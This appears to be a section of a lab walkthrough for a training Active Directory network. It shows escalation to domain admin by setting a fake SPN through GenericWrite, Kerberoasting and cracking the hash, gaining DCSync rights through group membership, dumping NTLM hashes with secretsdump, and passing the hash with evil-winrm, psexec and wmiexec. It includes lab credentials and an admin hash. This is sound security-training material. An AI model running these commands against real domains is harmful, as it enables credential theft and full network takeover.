DCSync

Previously we got these credentials: mssqladm:DBAilfreight1!

We can see that this user has Generic-Write right over ttimmons user. But nothing else here is interesting.

And this user can RDP into our DEV01(172.16.8.20) host. So we can RDP into this host and abuse this right. But as we remember this host only has terminal access and there is no GUI.

I used /drive:share so I can transfer PowerView.ps1. We can check the location for this share with the net use command. And after it is imported:

$SecPassword = ConvertTo-SecureString 'DBAilfreight1!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\mssqladm', $SecPassword)

Instead of just changing the password for the ttimmons user we can create a fake SPN on this account so we can kerberoast it can get the hash to either crack it or use it for PtH.

Set-DomainObject -credential $Cred -Identity ttimmons -SET @{serviceprincipalname='acmetesting/LEGIT'} -Verbose

Thats it. Now we can get the hash for this user:

GetUserSPNs.py -dc-ip 172.16.8.3 INLANEFREIGHT.LOCAL/mssqladm:DBAilfreight1! -request-user ttimmons

hashcat -m 13100 ttimmons_tgs /usr/share/wordlists/rockyou.txt

We now have a new credentials pair: ttimmons:Repeat09

This user has a Generic-All rights over server admins group.

And this group has a DCSync rights over the DC.

Step 1: Adding our user into the group

$timpass = ConvertTo-SecureString 'Repeat09' -AsPlainText -Force

$timcreds = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\ttimmons', $timpass)

$group = Convert-NameToSid "Server Admins"

Add-DomainGroupMember -Identity $group -Members 'ttimmons' -Credential $timcreds -verbose

Step 2: DCSync

secretsdump.py ttimmons:[email protected] -just-dc-ntlm

DC Admin

From there I got the hash for the DC administrator:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:fd1f7e5564060258ea787ddbb6e6afa2:::

Couldnt crack it with hashcat so using it for pth to access the DC: RDP is closed but WinRM, SMB, WMI are open. All of them will work.

evil-winrm -i 172.16.8.3 -u Administrator -H fd1f7e5564060258ea787ddbb6e6afa2

psexec.py INLANEFREIGHT.LOCAL/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:fd1f7e5564060258ea787ddbb6e6afa2

wmiexec.py INLANEFREIGHT.LOCAL/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:fd1f7e5564060258ea787ddbb6e6afa2

PreviousPost Exploitation NextPost-Exploitation

Last updated 10 months ago